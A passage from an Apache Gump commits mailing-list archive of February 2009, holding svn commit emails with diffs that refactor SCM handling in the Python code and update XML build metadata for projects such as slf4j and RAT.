scm: + return self.updaters.get(scm.getScmType()) return None def syncModule(self,module): From [email protected] Thu Feb 12 08:08:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30189 invoked from network); 12 Feb 2009 08:08:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2009 08:08:53 -0000 Received: (qmail 80120 invoked by uid 500); 12 Feb 2009 08:08:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80111 invoked by uid 99); 12 Feb 2009 08:08:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 00:08:52 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 08:08:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D8D1923889BB; Thu, 12 Feb 2009 08:08:26 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743647 - /gump/metadata/project/castor.xml Date: Thu, 12 Feb 2009 08:08:26 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 12 08:08:26 2009 New Revision: 743647 URL: http://svn.apache.org/viewvc?rev=743647&view=rev Log: maybe setting the groupid helps resolving the artifacts Modified: gump/metadata/project/castor.xml Modified: gump/metadata/project/castor.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/castor.xml?rev=743647&r1=743646&r2=743647&view=diff ============================================================================== --- gump/metadata/project/castor.xml (original) +++ gump/metadata/project/castor.xml Thu Feb 12 08:08:26 2009 @@ -15,7 +15,7 @@ See the License for the specific language governing permissions and limitations under the License. --> -<module name="castor"> +<module name="castor" groupId="org.codehaus.castor"> <url href="http://www.castor.org/"/> <description> From [email protected] Fri Feb 13 04:41:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41700 invoked from network); 13 Feb 2009 04:41:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 04:41:55 -0000 Received: (qmail 67455 invoked by uid 500); 13 Feb 2009 04:41:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67446 invoked by uid 99); 13 Feb 2009 04:41:55 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 20:41:55 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 04:41:54 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id AD5402388A9A; Fri, 13 Feb 2009 04:41:34 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743983 - /gump/trunk/python/gump/core/run/gumpenv.py Date: Fri, 13 Feb 2009 04:41:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 04:41:33 2009 New Revision: 743983 URL: http://svn.apache.org/viewvc?rev=743983&view=rev Log: Solaris' make doens't like --help either, so we can use --version as well. Modified: gump/trunk/python/gump/core/run/gumpenv.py Modified: gump/trunk/python/gump/core/run/gumpenv.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/run/gumpenv.py?rev=743983&r1=743982&r2=743983&view=diff ============================================================================== --- gump/trunk/python/gump/core/run/gumpenv.py (original) +++ gump/trunk/python/gump/core/run/gumpenv.py Fri Feb 13 04:41:33 2009 @@ -182,8 +182,7 @@ self.noMono = self._checkWithDashVersion('mono', "no Mono runtime") - self.noMake = self._checkWithDashVersion('make', "no make builds", - "--help") + self.noMake = self._checkWithDashVersion('make', "no make builds") self.noGit = self._checkWithDashVersion('git', 'no git repository updates') From [email protected] Fri Feb 13 05:11:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45635 invoked from network); 13 Feb 2009 05:11:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 05:11:35 -0000 Received: (qmail 84113 invoked by uid 500); 13 Feb 2009 05:11:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84104 invoked by uid 99); 13 Feb 2009 05:11:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 21:11:34 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 05:11:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0B4F12388A0E; Fri, 13 Feb 2009 05:11:14 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743987 - in /gump/trunk/python/gump: actor/document/xdocs/documenter.py core/model/module.py Date: Fri, 13 Feb 2009 05:11:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 05:11:13 2009 New Revision: 743987 URL: http://svn.apache.org/viewvc?rev=743987&view=rev Log: change documenter to be more generic when documenting the SCM Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py gump/trunk/python/gump/core/model/module.py Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/actor/document/xdocs/documenter.py?rev=743987&r1=743986&r2=743987&view=diff ============================================================================== --- gump/trunk/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/trunk/python/gump/actor/document/xdocs/documenter.py Fri Feb 13 05:11:13 2009 @@ -1645,36 +1645,38 @@ module, \ repoList.createEntry( "Repository: ") ) - if module.hasCvs(): - if module.getScm().hasModule(): - repoList.createEntry( "CVS Module: ", module.getScm().getModule()) + scm = module.getScm() + if scm: + scmName = scm.getScmName() + if scm.hasDir(): + repoList.createEntry(scmName + " Directory: ", scm.getDir()) + if scm.getScmType() == 'cvs': + if scm.hasModule(): + repoList.createEntry(scmName + " Module: ", + scm.getModule()) - if module.getScm().hasTag(): - repoList.createEntry( "CVS Tag: ", module.getScm().getTag()) - - if module.getScm().hasDir(): - repoList.createEntry( "CVS Dir: ", module.getScm().getDir()) - - if module.getScm().hasHostPrefix(): - repoList.createEntry( "CVS Host Prefix: ", module.getScm().getHostPrefix()) + if scm.hasTag(): + repoList.createEntry(scmName + " Tag: ", scm.getTag()) + + if scm.hasHostPrefix(): + repoList.createEntry(scmName + " Host Prefix: ", + scm.getHostPrefix()) - repoList.createEntry( "CVSROOT: ", module.getScm().getCvsRoot()) + repoList.createEntry("CVSROOT: ", scm.getCvsRoot()) + + elif scm.getScmType() == 'p4': + if scm.hasTag(): + repoList.createEntry(scmName + " Tag: ", scm.getTag()) - if module.hasSvn(): - if module.getScm().hasDir(): - repoList.createEntry( "SVN Directory: ", module.getScm().getDir()) - repoList.createEntry( "SVN URL: ", module.getScm().getRootUrl()) + repoList.createEntry(scmName + " Port: ", scm.getPort()) + repoList.createEntry(scmName + " Clientspec: ", + scm.getClientspec()) - if module.hasGit(): - if module.getScm().hasDir(): - repoList.createEntry( "GIT Directory: ", module.getScm().getDir()) - repoList.createEntry( "GIT URL: ", module.getScm().getRootUrl()) + repoList.createEntry(scmName + " URL: ", scm.getRootUrl()) - if module.hasArtifacts(): - if module.getScm().hasUrl(): - repoList.createEntry( "Jars URL: ", module.artifacts.getUrl()) - repoList.createEntry('Redistributable: ', module.isRedistributable()) + repoList.createEntry('Redistributable: ', + module.isRedistributable()) document.serialize() document=None Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=743987&r1=743986&r2=743987&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Fri Feb 13 05:11:13 2009 @@ -45,7 +45,7 @@ def getRootUrl(self): url = self.repository.getUrl() - if self.hasDir(): + if url and self.hasDir(): url += self.getDir() return url @@ -62,6 +62,9 @@ def getScmType(self): return self.type + def getScmName(self): + return self.repository.getType() + class ModuleCvs(ModuleScm): def __init__(self,dom,repository): ModuleScm.__init__(self, dom, repository) From [email protected] Fri Feb 13 05:34:01 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55160 invoked from network); 13 Feb 2009 05:34:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 05:34:01 -0000 Received: (qmail 98949 invoked by uid 500); 13 Feb 2009 05:34:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98940 invoked by uid 99); 13 Feb 2009 05:34:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 12 Feb 2009 21:34:01 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 05:34:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6F1BB2388A0E; Fri, 13 Feb 2009 05:33:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743993 - in /gump/trunk/python/gump: core/model/module.py test/model.py Date: Fri, 13 Feb 2009 05:33:40 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 05:33:39 2009 New Revision: 743993 URL: http://svn.apache.org/viewvc?rev=743993&view=rev Log: remove hasCvs and friends Modified: gump/trunk/python/gump/core/model/module.py gump/trunk/python/gump/test/model.py Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=743993&r1=743992&r2=743993&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Fri Feb 13 05:33:39 2009 @@ -720,21 +720,6 @@ def isUpdatable(self): return len(self.scms) > 0 - def hasCvs(self): - return 'cvs' in self.scms - - def hasSvn(self): - return 'svn' in self.scms - - def hasP4(self): - return 'p4' in self.scms - - def hasArtifacts(self): - return 'artifacts' in self.scms - - def hasGit(self): - return 'git' in self.scms - # Where the contents (at the repository) Modified? def isModified(self): return self.modified @@ -765,13 +750,13 @@ # CVS over svn over P4 over GIT and artifacts last # will be swapped against a list based version later - if self.hasCvs(): + if 'cvs' in self.scms: return self.scms['cvs'] - if self.hasSvn(): + if 'svn' in self.scms: return self.scms['svn'] - if self.hasP4(): + if 'p4' in self.scms: return self.scms['p4'] - if self.hasGit(): + if 'git' in self.scms: return self.scms['git'] return self.scms.get('artifacts') Modified: gump/trunk/python/gump/test/model.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/test/model.py?rev=743993&r1=743992&r2=743993&view=diff ============================================================================== --- gump/trunk/python/gump/test/model.py (original) +++ gump/trunk/python/gump/test/model.py Fri Feb 13 05:33:39 2009 @@ -166,8 +166,8 @@ module1=self.module1 module2=self.module2 - self.assertTrue('Module has CVS', module1.hasCvs()) - self.assertFalse('Module has NOT SVN', module1.hasSvn()) + self.assertTrue('Module has CVS', + module1.getScm().getScmType() == 'cvs') self.assertNonZeroString('CVSROOT',module1.cvs.getCvsRoot()) self.assertNonZeroString('Has Tag',module1.cvs.getTag()) self.assertNonZeroString('Has Tag',module2.getTag()) @@ -175,8 +175,8 @@ def testSvn(self): svnmodule1= self.workspace.getModule('svn_module1') - self.assertTrue('Module has SVN', svnmodule1.hasSvn()) - self.assertFalse('Module has NOT CVS', svnmodule1.hasCvs()) + self.assertTrue('Module has SVN', + module1.getScm().getScmType() == 'svn') self.assertNonZeroString('SVN URL',svnmodule1.svn.getRootUrl()) self.assertTrue('SVN Dir',svnmodule1.svn.hasDir()) From [email protected] Fri Feb 13 08:53:10 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45893 invoked from network); 13 Feb 2009 08:53:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 08:53:10 -0000 Received: (qmail 55144 invoked by uid 500); 13 Feb 2009 08:53:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55134 invoked by uid 99); 13 Feb 2009 08:53:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 00:53:10 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 08:53:09 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6007423889D0; Fri, 13 Feb 2009 08:52:49 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744037 - /gump/metadata/project/slf4j.xml Date: Fri, 13 Feb 2009 08:52:49 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 08:52:48 2009 New Revision: 744037 URL: http://svn.apache.org/viewvc?rev=744037&view=rev Log: bump version Modified: gump/metadata/project/slf4j.xml Modified: gump/metadata/project/slf4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/slf4j.xml?rev=744037&r1=744036&r2=744037&view=diff ============================================================================== --- gump/metadata/project/slf4j.xml (original) +++ gump/metadata/project/slf4j.xml Fri Feb 13 08:52:48 2009 @@ -36,18 +36,18 @@ <option project="xml-apis"/> <option project="xml-xerces"/> - <jar name="slf4j-api/target/slf4j-api-1.5.6.jar" id="slf4j-api"/> - <jar name="slf4j-simple/target/slf4j-simple-1.5.6.jar" id="slf4j-simple"/> - <jar name="slf4j-nop/target/slf4j-nop-1.5.6.jar" id="slf4j-nop"/> - <jar name="slf4j-jdk14/target/slf4j-jdk14-1.5.6.jar" id="slf4j-jdk14"/> - <jar name="slf4j-log4j12/target/slf4j-log4j12-1.5.6.jar" id="slf4j-log4j12"/> - <jar name="slf4j-jcl/target/slf4j-jcl-1.5.6.jar" id="slf4j-jcl"/> - <jar name="slf4j-ext/target/slf4j-ext-1.5.6.jar" id="slf4j-ext"/> - <jar name="jcl-over-slf4j/target/jcl-over-slf4j-1.5.6.jar" id="jcl-over-slf4j"/> - <jar name="jcl104-over-slf4j/target/jcl104-over-slf4j-1.5.6.jar" id="jcl104-over-slf4j"/> - <jar name="log4j-over-slf4j/target/log4j-over-slf4j-1.5.6.jar" id="log4j-over-slf4j"/> - <jar name="jul-to-slf4j/target/jul-to-slf4j-1.5.6.jar" id="jul-to-slf4j"/> - <jar name="slf4j-migrator/target/slf4j-migrator-1.5.6.jar" id="slf4j-migrator"/> + <jar name="slf4j-api/target/slf4j-api-1.5.7-SNAPSHOT.jar" id="slf4j-api"/> + <jar name="slf4j-simple/target/slf4j-simple-1.5.7-SNAPSHOT.jar" id="slf4j-simple"/> + <jar name="slf4j-nop/target/slf4j-nop-1.5.7-SNAPSHOT.jar" id="slf4j-nop"/> + <jar name="slf4j-jdk14/target/slf4j-jdk14-1.5.7-SNAPSHOT.jar" id="slf4j-jdk14"/> + <jar name="slf4j-log4j12/target/slf4j-log4j12-1.5.7-SNAPSHOT.jar" id="slf4j-log4j12"/> + <jar name="slf4j-jcl/target/slf4j-jcl-1.5.7-SNAPSHOT.jar" id="slf4j-jcl"/> + <jar name="slf4j-ext/target/slf4j-ext-1.5.7-SNAPSHOT.jar" id="slf4j-ext"/> + <jar name="jcl-over-slf4j/target/jcl-over-slf4j-1.5.7-SNAPSHOT.jar" id="jcl-over-slf4j"/> + <jar name="jcl104-over-slf4j/target/jcl104-over-slf4j-1.5.7-SNAPSHOT.jar" id="jcl104-over-slf4j"/> + <jar name="log4j-over-slf4j/target/log4j-over-slf4j-1.5.7-SNAPSHOT.jar" id="log4j-over-slf4j"/> + <jar name="jul-to-slf4j/target/jul-to-slf4j-1.5.7-SNAPSHOT.jar" id="jul-to-slf4j"/> + <jar name="slf4j-migrator/target/slf4j-migrator-1.5.7-SNAPSHOT.jar" id="slf4j-migrator"/> <license name="LICENSE.txt"/> </project> From [email protected] Fri Feb 13 08:54:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46602 invoked from network); 13 Feb 2009 08:54:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 08:54:22 -0000 Received: (qmail 56564 invoked by uid 500); 13 Feb 2009 08:54:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56555 invoked by uid 99); 13 Feb 2009 08:54:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 00:54:22 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 08:54:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id CDC1C23889B2; Fri, 13 Feb 2009 08:53:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744040 - /gump/metadata/project/ant-antlibs.xml Date: Fri, 13 Feb 2009 08:53:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 08:53:59 2009 New Revision: 744040 URL: http://svn.apache.org/viewvc?rev=744040&view=rev Log: AntUnit needs JUnit now Modified: gump/metadata/project/ant-antlibs.xml Modified: gump/metadata/project/ant-antlibs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant-antlibs.xml?rev=744040&r1=744039&r2=744040&view=diff ============================================================================== --- gump/metadata/project/ant-antlibs.xml (original) +++ gump/metadata/project/ant-antlibs.xml Fri Feb 13 08:53:59 2009 @@ -32,6 +32,7 @@ </ant> <depend project="ant"/> + <depend project="junit"/> <depend project="xml-xerces"/> <depend project="xml-apis"/> From [email protected] Fri Feb 13 16:26:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31397 invoked from network); 13 Feb 2009 16:26:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Feb 2009 16:26:18 -0000 Received: (qmail 38800 invoked by uid 500); 13 Feb 2009 16:26:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38791 invoked by uid 99); 13 Feb 2009 16:26:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 08:26:18 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 13 Feb 2009 16:26:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 66DF923888A2; Fri, 13 Feb 2009 16:25:55 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744164 - in /gump/metadata: profile/gump.xml project/rat.xml Date: Fri, 13 Feb 2009 16:25:55 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 13 16:25:54 2009 New Revision: 744164 URL: http://svn.apache.org/viewvc?rev=744164&view=rev Log: try building RAT Added: gump/metadata/project/rat.xml (with props) Modified: gump/metadata/profile/gump.xml Modified: gump/metadata/profile/gump.xml URL: http://svn.apache.org/viewvc/gump/metadata/profile/gump.xml?rev=744164&r1=744163&r2=744164&view=diff ============================================================================== --- gump/metadata/profile/gump.xml (original) +++ gump/metadata/profile/gump.xml Fri Feb 13 16:25:54 2009 @@ -27,6 +27,7 @@ <module href="project/ant.xml"/> <module href="project/ant-antlibs.xml"/> <module href="project/ant-antlibs-sandbox.xml"/> + <module href="project/ivy.xml"/> <!--module href="project/ant-1.5.xml"/--> <!-- Apache.Avalon (SVN) --> @@ -89,7 +90,7 @@ <!--module href="project/depot.xml"/--> <!--module href="project/incubator-altrmi.xml"/--> - <module href="project/ivy.xml"/> + <module href="project/rat.xml"/> <!-- Apache.Directory --> <module href="project/directory-naming.xml"/> Added: gump/metadata/project/rat.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/rat.xml?rev=744164&view=auto ============================================================================== --- gump/metadata/project/rat.xml (added) +++ gump/metadata/project/rat.xml Fri Feb 13 16:25:54 2009 @@ -0,0 +1,39 @@ +<?xml version="1.0" ?> +<!-- + Licensed to the Apache Software Foundation (ASF) under one or more + contributor license agreements. See the NOTICE file distributed with + this work for additional information regarding copyright ownership. + The ASF licenses this file to You under the Apache License, Version 2.0 + (the "License"); you may not use this file except in compliance with + the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. +--> +<module name="rat" groupId="org.apache.rat"> + + <url href="http://incubator.apache.org/rat/"/> + <description> + Release Audit Tool + </description> + + <svn repository="apache-incubator-svn" dir="rat/main/trunk/rat"/> + + <!-- build --> + <project name="rat"> + <package>org.apache.rat</package> + <mvn separateLocalRepository="true"/> + <option project="ant"/> + <option project="antunit"/> + <option project="commons-cli"/> + <option project="commons-collections"/> + <option project="commons-lang"/> + <option project="junit"/> + </project> + +</module> Propchange: gump/metadata/project/rat.xml ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Sat Feb 14 10:16:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40490 invoked from network); 14 Feb 2009 10:16:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Feb 2009 10:16:27 -0000 Received: (qmail 86867 invoked by uid 500); 14 Feb 2009 10:16:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86857 invoked by uid 99); 14 Feb 2009 10:16:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 14 Feb 2009 02:16:27 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 14 Feb 2009 10:16:25 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 793652388888; Sat, 14 Feb 2009 10:16:04 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744460 - /gump/metadata/project/rat.xml Date: Sat, 14 Feb 2009 10:16:04 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Sat Feb 14 10:16:04 2009 New Revision: 744460 URL: http://svn.apache.org/viewvc?rev=744460&view=rev Log: split tests from build Modified: gump/metadata/project/rat.xml Modified: gump/metadata/project/rat.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/rat.xml?rev=744460&r1=744459&r2=744460&view=diff ============================================================================== --- gump/metadata/project/rat.xml (original) +++ gump/metadata/project/rat.xml Sat Feb 14 10:16:04 2009 @@ -24,16 +24,24 @@ <svn repository="apache-incubator-svn" dir="rat/main/trunk/rat"/> - <!-- build --> <project name="rat"> <package>org.apache.rat</package> - <mvn separateLocalRepository="true"/> + <mvn separateLocalRepository="true"> + <property name="maven.test.skip" value="true"/> + </mvn> <option project="ant"/> <option project="antunit"/> <option project="commons-cli"/> <option project="commons-collections"/> <option project="commons-lang"/> <option project="junit"/> + <jar name="rat-core/target/rat-core-0.6-SNAPSHOT.jar" id="rat-core"/> + </project> + + <project name="rat-test"> + <package>org.apache.rat</package> + <mvn separateLocalRepository="true"/> + <depend project="rat"/> </project> </module> From [email protected] Sat Feb 14 10:20:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45530 invoked from network); 14 Feb 2009 10:20:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Feb 2009 10:20:30 -0000 Received: (qmail 88937 invoked by uid 500); 14 Feb 2009 10:20:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88928 invoked by uid 99); 14 Feb 2009 10:20:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 14 Feb 2009 02:20:30 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 14 Feb 2009 10:20:27 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 698D12388888; Sat, 14 Feb 2009 10:20:06 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744462 - /gump/trunk/python/gump/core/model/module.py Date: Sat, 14 Feb 2009 10:20:06 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Sat Feb 14 10:20:05 2009 New Revision: 744462 URL: http://svn.apache.org/viewvc?rev=744462&view=rev Log: unify scm subelement parsing in module Modified: gump/trunk/python/gump/core/model/module.py Modified: gump/trunk/python/gump/core/model/module.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/module.py?rev=744462&r1=744461&r2=744462&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/module.py (original) +++ gump/trunk/python/gump/core/model/module.py Sat Feb 14 10:20:05 2009 @@ -208,7 +208,7 @@ self.notifys=[] self.repository=None - self.scms = {} + self.scm = 